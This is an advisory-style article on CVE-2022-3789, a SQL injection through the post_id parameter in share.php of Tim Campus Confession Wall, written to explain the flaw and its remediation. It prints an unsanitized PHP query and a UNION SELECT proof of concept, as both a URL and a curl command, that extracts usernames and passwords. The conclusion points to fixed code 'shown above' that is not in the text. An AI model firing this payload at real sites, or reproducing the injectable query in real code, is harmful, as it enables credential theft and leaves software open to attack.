Summary:  
A critical security flaw (CVE-2022-3789) was discovered in Tim Campus Confession Wall—a platform popular with university students for posting anonymous confessions. The vulnerability is a SQL injection found in the share.php file, specifically in the way it handles the post_id parameter. Attackers can exploit this flaw to manipulate the database, steal sensitive data, or gain unauthorized access. This issue is tracked under VDB-212611.

In this article, we’ll break down how the vulnerability works, show code snippets related to the flaw, examine proof-of-concept exploitation, and provide practical advice for remediation. We’ll also link to original references for further reading.

What is SQL Injection?

SQL injection happens when attackers send malicious SQL statements to a web application, tricking it into executing unintended commands. By not properly sanitizing user input, a vulnerable website lets attackers interfere directly with the database.

Vulnerability Details: Where’s the Problem?

The problem lies in the share.php script—a core part of the Tim Campus Confession Wall platform. The script uses the post_id GET or POST parameter to fetch database records. Unfortunately, this value isn’t properly sanitized or parameterized, allowing attackers to inject raw SQL.

Affected File: share.php  
Vulnerable Parameter: post_id  
Vulnerability Type: SQL Injection  
CVE ID: CVE-2022-3789  
VDB Reference: VDB-212611

Let’s look at a vulnerable PHP code example similar to what’s found in share.php

<?php
// share.php

include("db.php");

if (isset($_GET['post_id'])) {
    $post_id = $_GET['post_id'];
    // Vulnerable query: $post_id is NOT sanitized!
    $result = mysqli_query($conn, "SELECT * FROM posts WHERE id = $post_id");
    $row = mysqli_fetch_assoc($result);
    echo $row['confession'];
}
?>

Problem:
The $post_id variable is used directly in the SQL query, giving attackers full control over the query statement.

Exploit Example

With no input checking, attackers can run arbitrary queries. Here’s how an attacker could exploit this vulnerability to dump the first user in the users table:

Malicious URL

https://example.com/share.php?post_id=1%20UNION%20SELECT%201,username,password%20FROM%20users%20LIMIT%201;--

Sample POC request using curl

curl 'https://example.com/share.php?post_id=1 UNION SELECT 1,username,password FROM users LIMIT 1;--'

If no protections are in place, the confession text may now show a username or hashed password.

Threat Impact

- Data Leak: Attackers can access, modify, or even delete confidential confession posts or user credentials.

Account Takeover: If users (like admins) reuse passwords, their accounts are at risk.

- Further Attacks: Gained access can be used to deploy malware, deface content, or pivot deeper into the infrastructure.

Never interpolate user input directly into SQL. Use parameterized queries instead.

References & Sources

- Official CVE Entry – CVE-2022-3789  
- VulDB Entry – VDB-212611  
- OWASP: SQL Injection

Conclusion

CVE-2022-3789 in Tim Campus Confession Wall’s share.php is a dangerous, public SQL injection flaw (VDB-212611). If you host or develop for this platform, take immediate action. Script kiddies and advanced attackers alike are already aware of this bug, and exploitation tools are widely available. Update your code as shown above, audit other entry points, and prioritize security awareness in your web development processes.

> If you’re a user: avoid entering personal data on vulnerable platforms, and change your passwords if you think you might be exposed.

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/03/2022 14:51:00 UTC